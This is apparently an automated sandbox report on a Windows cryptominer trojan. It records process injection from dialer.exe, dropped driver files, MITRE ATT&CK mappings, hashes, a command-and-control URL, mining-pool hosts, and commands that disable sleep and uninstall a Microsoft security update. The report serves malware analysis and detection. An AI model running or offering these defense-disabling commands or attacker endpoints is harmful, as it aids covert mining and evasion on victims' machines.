Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25177B50000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 28D5D340000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 24EB5E10000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20859990000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F153C20000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D241D40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 16FADAD0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 20E03070000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15204DB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: 11C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 175C5280000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22EF1B30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34F0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 261DE4D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74520000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 226D8930000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13E5E930000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F844120000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27234C50000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28543540000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 2B684340000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1CE69900000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 29283380000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 193FA700000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1CBD1BD0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28A84D30000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 28571390000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2551B760000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 20C383F0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 20C38E60000
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\IGaming\driver.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\ProgramData\IGaming\driver.exe Process created: C:\Windows\System32\dialer.exe dialer.exe
Source: C:\Windows\System32\dialer.exe Code function: 14_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,14_2_0000000140001B54
Source: winlogon.exe, 00000015.00000002.3382587390.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000015.00000000.2115486873.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001F.00000000.2129847734.0000011605EC1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: winlogon.exe, 00000015.00000002.3382587390.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000015.00000000.2115486873.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001F.00000000.2129847734.0000011605EC1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000015.00000002.3382587390.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000015.00000000.2115486873.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001F.00000000.2129847734.0000011605EC1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: winlogon.exe, 00000015.00000002.3382587390.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000015.00000000.2115486873.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001F.00000000.2129847734.0000011605EC1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Windows\System32\winlogon.exe Code function: 21_2_000001E8589636F0 cpuid 21_2_000001E8589636F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation
Source: C:\Windows\System32\winlogon.exe Code function: 21_2_000001E858987960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,21_2_000001E858987960
Source: C:\Windows\System32\dialer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\IGaming\driver.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\IGaming\driver.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D206000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: procexp.exe
Source: Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.52.dr Binary or memory string: MsMpEng.exe
MITRE ATT&CK matrix (tactics: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact). Only techniques that carry signature hits are listed below; the hit counts are given as rendered in the matrix.

• Execution: Windows Management Instrumentation (11), Native API (2), Service Execution (1)
• Persistence: DLL Side-Loading (1), Windows Service (11)
• Privilege Escalation: DLL Side-Loading (1), Access Token Manipulation (1), Windows Service (11), Process Injection (713)
• Defense Evasion: Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Install Root Certificate (1), DLL Side-Loading (1), File Deletion (1), Rootkit (4), Masquerading (1), Modify Registry (1), Virtualization/Sandbox Evasion (131), Access Token Manipulation (1), Process Injection (713), Hidden Files and Directories (1)
• Credential Access: Credential API Hooking (1)
• Discovery: System Time Discovery (1), File and Directory Discovery (1), System Information Discovery (24), Security Software Discovery (441), Process Discovery (2), Virtualization/Sandbox Evasion (131), Application Window Discovery (1)
• Collection: Archive Collected Data (1), Credential API Hooking (1)
• Command and Control: Encrypted Channel (1), Non-Standard Port (1), Non-Application Layer Protocol (2), Application Layer Protocol (2)
• Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration and Impact: no techniques with signature hits
Behavior Graph ID: 1584229, Sample: file.exe, Start date: 04/01/2025, Architecture: WINDOWS, Score: 100

Top-level signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected Xmrig cryptocurrency miner; 10 other signatures.

Contacted hosts: pool-fr.supportxmr.com (141.94.96.144, ports 49704 and 8080, DFNVereinzurFoerderungeinesDeutschenForschungsnetzese, Germany; Detected Stratum mining protocol); 83.217.209.235 (ports 49705, 57087 and 57089, INF-NET-ASRU, Russian Federation); pool.supportxmr.com; 198.187.3.20.in-addr.arpa.

Process tree:
file.exe (started)
  dropped: C:\ProgramData\IGaming\driver.exe (PE32+)
  signatures: Uses powercfg.exe to modify the power settings; Modifies power options to not sleep / hibernate
  dialer.exe (started)
    signatures: Contains functionality to inject code into remote processes; Writes to foreign memory regions; Allocates memory in foreign processes; Contains functionality to compare user and computer (likely to detect sandboxes)
    lsass.exe (injected): Installs new ROOT certificates; Writes to foreign memory regions
    winlogon.exe (injected)
    2 other processes (injected)
  powershell.exe (started): Loading BitLocker PowerShell Module
    conhost.exe (started)
  cmd.exe (started)
    2 other processes
  8 other processes
driver.exe (started)
  dropped: C:\Windows\Temp\ftnvuqwjtdwb.sys (PE32+)
  signatures: Multi AV Scanner detection for dropped file; Modifies the context of a thread in another process (thread injection); Adds a directory exclusion to Windows Defender; Sample is not signed and drops a device driver
  dialer.exe (started)
    signatures: Injects code into the Windows Explorer (explorer.exe); Creates a thread in another existing process (thread injection); Injects a PE file into a foreign processes
    14 other processes
  dialer.exe (started)
    network: pool-fr.supportxmr.com 141.94.96.144 (49704, 8080); 83.217.209.235 (49705, 57087, 57089)
    signatures: Query firmware table information (likely to detect VMs); Found strings related to Crypto-Mining; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
  powershell.exe (started)
    conhost.exe (started)
  6 other processes

Antivirus detection, submitted file (Source | Detection | Scanner | Label):
file.exe | 80% | Virustotal |
file.exe | 82% | ReversingLabs | Win64.Trojan.MintZard

Antivirus detection, dropped files (Source | Detection | Scanner | Label):
C:\ProgramData\IGaming\driver.exe | 82% | ReversingLabs | Win64.Trojan.MintZard
C:\Windows\Temp\ftnvuqwjtdwb.sys | 5% | ReversingLabs |

No Antivirus matches
Antivirus detection, URLs (Source | Detection | Scanner | Label):
http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php--c | 0% | Avira URL Cloud | safe
http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php)L | 0% | Avira URL Cloud | safe
https://172.94.1q | 0% | Avira URL Cloud | safe
http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpldn | 0% | Avira URL Cloud | safe
http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpo | 0% | Avira URL Cloud | safe
http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpaL( | 0% | Avira URL Cloud | safe
http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php | 0% | Avira URL Cloud | safe
http://3csp.icrosof4m/ocp0 | 0% | Avira URL Cloud | safe
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
pool-fr.supportxmr.com | 141.94.96.144 | true | true | | unknown
pool.supportxmr.com | unknown | unknown | false | | high
198.187.3.20.in-addr.arpa | unknown | unknown | false | | high
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php | true | Avira URL Cloud: safe | unknown
URLs from memory and binary strings (Name | Source | Malicious | Antivirus Detection | Reputation):
http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php--c | dialer.exe, 0000002D.00000002.3378194513.0000021C6D165000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy | lsass.exe, 0000001B.00000002.3372519545.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2121952764.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2121998643.00000140AD850000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702 | lsass.exe, 0000001B.00000000.2121952764.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/09/policy | lsass.exe, 0000001B.00000000.2121952764.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/erties | lsass.exe, 0000001B.00000000.2121952764.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/soap12/ | lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpaL( | dialer.exe, 0000002D.00000002.3378194513.0000021C6D165000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://3csp.icrosof4m/ocp0 | lsass.exe, 0000001B.00000002.3380812837.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122868011.00000140AE074000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://172.94.1q | dialer.exe, 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://xmrig.com/docs/algorithms | dialer.exe, 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmp | false | | high
http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpo | dialer.exe, 0000002D.00000002.3378194513.0000021C6D180000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/trust | lsass.exe, 0000001B.00000000.2121952764.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/ws-sx/ws-trust/200512 | lsass.exe, 0000001B.00000002.3372519545.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2121998643.00000140AD850000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | lsass.exe, 0000001B.00000000.2121952764.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php)L | dialer.exe, 0000002D.00000002.3378194513.0000021C6D165000.00000004.00000020.00020000.00000000.sdmp | false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpldndialer.exe, 0000002D.00000003.2147213918.0000021C6D181000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://schemas.microsvchost.exe, 00000035.00000002.3378496559.000001A204EE0000.00000002.00000001.00040000.00000000.sdmpfalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
141.94.96.144 | pool-fr.supportxmr.com | Germany | 680 | DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | true
83.217.209.235 | unknown | Russian Federation | 31514 | INF-NET-ASRU | true
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1584229
                                      Start date and time:2025-01-04 22:57:11 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 10m 40s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:42
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:18
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:file.exe
                                      Detection:MAL
                                      Classification:mal100.spyw.evad.mine.winEXE@62/72@2/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                                      • Excluded IPs from analysis (whitelisted): 40.126.32.133, 40.126.32.74, 40.126.32.76, 20.190.160.17, 40.126.32.72, 40.126.32.136, 20.190.160.20, 20.190.160.22, 13.107.246.45, 4.175.87.197, 20.3.187.198, 20.12.23.50
                                      • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
16:58:05 | API Interceptor | 1x Sleep call for process: file.exe modified
16:58:06 | API Interceptor | 34x Sleep call for process: powershell.exe modified
16:58:42 | API Interceptor | 306678x Sleep call for process: lsass.exe modified
16:58:42 | API Interceptor | 383973x Sleep call for process: winlogon.exe modified
16:58:43 | API Interceptor | 3369x Sleep call for process: svchost.exe modified
16:58:45 | API Interceptor | 367857x Sleep call for process: dwm.exe modified
16:58:48 | API Interceptor | 1834x Sleep call for process: dialer.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
141.94.96.144 | egFMhHSlmf.exe | malicious | Xmrig |
| kWYLtJ0Cn1.exe | malicious | LoaderBot, Xmrig |
| FieroHack.exe | malicious | Xmrig |
| h2UFp4aCRq.exe | malicious | LoaderBot, Xmrig |
| curriculum_vitae-copie.vbs | malicious | Xmrig |
| curriculum_vitae-copie_(1).vbs | malicious | Xmrig |
| curriculum_vitae-copie.vbs | malicious | Xmrig |
| Vsob3IooE7.exe | malicious | Xmrig |
| GameBar.exe | malicious | Xmrig |
| FTrondtloadws.exe | malicious | Xmrig |
83.217.209.235 | SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe | malicious | Xmrig | 83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php
Match | Associated Sample Name / URL | Detection | Threat Name | Context
pool-fr.supportxmr.com | SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe | malicious | Xmrig | 141.94.96.71
| file.exe | malicious | Xmrig | 141.94.96.71
| egFMhHSlmf.exe | malicious | Xmrig | 141.94.96.71
| xmr_linux_amd64 (2).elf | malicious | Xmrig | 141.94.96.195
| xmr_linux_amd64.elf | malicious | Xmrig | 141.94.96.195
| SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe | malicious | Xmrig | 141.94.96.144
| Q3pEXxmWAD.exe | malicious | Xmrig | 141.94.96.195
| file.exe | malicious | Amadey, Babadeda, Stealc, Vidar, Xmrig | 141.94.96.71
| kWYLtJ0Cn1.exe | malicious | LoaderBot, Xmrig | 141.94.96.195
| updater.exe | malicious | Xmrig | 141.94.96.71
Match | Associated Sample Name / URL | Detection | Threat Name | Context
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | fuckunix.sh4.elf | malicious | Mirai | 141.27.79.124
| fuckunix.arm.elf | malicious | Mirai | 194.95.45.209
| fuckunix.mips.elf | malicious | Mirai | 141.94.159.206
| 31.13.224.14-mips-2025-01-03T22_14_18.elf | malicious | Mirai | 141.93.170.216
| 2.elf | malicious | Unknown | 134.245.99.197
| DEMONS.ppc.elf | malicious | Unknown | 140.181.34.221
| armv7l.elf | malicious | Unknown | 141.33.21.24
| armv4l.elf | malicious | Unknown | 132.176.238.215
| https://mmm.askfollow.us/#CRD | malicious | Unknown | 141.95.98.65
| https://t.co/YjyGioQuKT | malicious | Unknown | 141.95.98.64
INF-NET-ASRU | Fantazy.mpsl.elf | malicious | Unknown | 89.169.70.231
| bot.mpsl.elf | malicious | Mirai, Gafgyt, Okiru | 89.169.4.44
| bot.x86.elf | malicious | Mirai, Okiru | 89.169.4.44
| bot.ppc.elf | malicious | Mirai, Gafgyt, Okiru | 89.169.4.44
| bot.sh4.elf | malicious | Mirai, Gafgyt, Okiru | 89.169.4.44
| bot.arm.elf | malicious | Mirai, Gafgyt, Okiru | 89.169.4.44
| bot.x86_64.elf | malicious | Mirai, Gafgyt, Okiru | 89.169.4.44
| bot.m68k.elf | malicious | Mirai, Gafgyt, Okiru | 89.169.4.44
| bot.arm5.elf | malicious | Mirai, Gafgyt, Okiru | 89.169.4.44
| bot.mips.elf | malicious | Mirai, Gafgyt, Okiru | 89.169.4.44
                                                          No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Windows\Temp\ftnvuqwjtdwb.sys | hiwA7Blv7C.exe | malicious | Xmrig |
| 5fr5gthkjdg71.exe | malicious | Quasar, R77 RootKit |
| aAcx14Rjtw.exe | malicious | Xmrig |
| SharcHack.exe | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig |
| 0Ty.png.exe | malicious | Xmrig |
| Qhx6a6VLAH.exe | malicious | Xmrig |
| 88aext0k.exe | malicious | Xmrig |
| gaozw40v.exe | malicious | Xmrig |
| c2.exe | malicious | Xmrig |
| ldr.ps1 | malicious | GO Miner, Xmrig |
                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2867712
                                                                              Entropy (8bit):6.540079343872506
                                                                              Encrypted:false
                                                                              SSDEEP:49152:U7N5o20VC8FlpAi4y/8t6x4EBka+Okl5lo5V5i7b6LR7QY6Vtnah:c2VCkxp8t69kBOtVebk6q
                                                                              MD5:A03484846E3418FFA2AB8AEC97A03E88
                                                                              SHA1:54C62C97DB8B0234EEB7A03D66B73F9D1DC22614
                                                                              SHA-256:6932616523C8080FD908D4B776F416A4D32653E657C2CBE75A42CDC0A8B5C4D1
                                                                              SHA-512:0F1661DD055E34CA4C8F37BCCF1AEE739BE12A1C6836C0AF00C0C156E59E363CE0C59F4B0E1402D4367A3D9E3BABC00AA5C7E512579F9295942150539103BA8F
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 82%
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64
                                                                              Entropy (8bit):1.1940658735648508
                                                                              Encrypted:false
                                                                              SSDEEP:3:Nlllul3nqth:NllUa
                                                                              MD5:851531B4FD612B0BC7891B3F401A478F
                                                                              SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                                              SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                                              SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                                              Malicious:false
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\svchost.exe
